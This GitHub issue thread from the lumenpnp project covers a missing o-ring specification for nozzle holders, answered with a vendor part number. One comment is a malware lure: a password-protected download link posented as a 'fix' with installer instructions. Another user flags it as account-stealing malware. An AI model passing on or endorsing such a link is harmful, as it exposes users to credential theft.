opulo-inc/lumenpnp #731: Nozzle design o-ring specification

asm308, 2024-08-27:
# Version Number
looking at the rev05 branch

#Description
I was looking at the drawings for the nozzle holders but I don't see anything that provides a specification of the o-ring required.

Am I missing something or is this missing from the drawings 

Thanks

c0ffincolors, 2024-08-27:
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

caineblood, 2024-08-27:
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

lucian151, 2024-09-03:
Hi @asm308, thanks for the note. For now you can reference the following information and I'll update the source to be more helpful on this later.
VENDOR | PART NUMBER | BUY UNITS | COMMENT |  
-- | -- | -- | -- | --
Polymax Ltd | 4X0.6N70 | each | https://www.polymax.co.uk/o-ring-4mm-id-x-0-6mm-cs-nitrile-70-sha

asm308, 2024-09-03:
Thanks Lucian. Much appreciated

commit 1f2d363b (2024-09-09): Updates BOM with nozzle-holder child items + misc changes

- Closes #731 by addding nozzle-holder-o-ring sourcing info
- Adds all other items used to make nozzle-holder
- Adds soft-pvc-tubing-6x4-red QTY
- Adds soft-pvc-tubing-6x4-blue QTY
- Updates filament amount
- Adds 2nd source for reducing-union-tee-4-6-4
closed 2024-09-09 by lucian151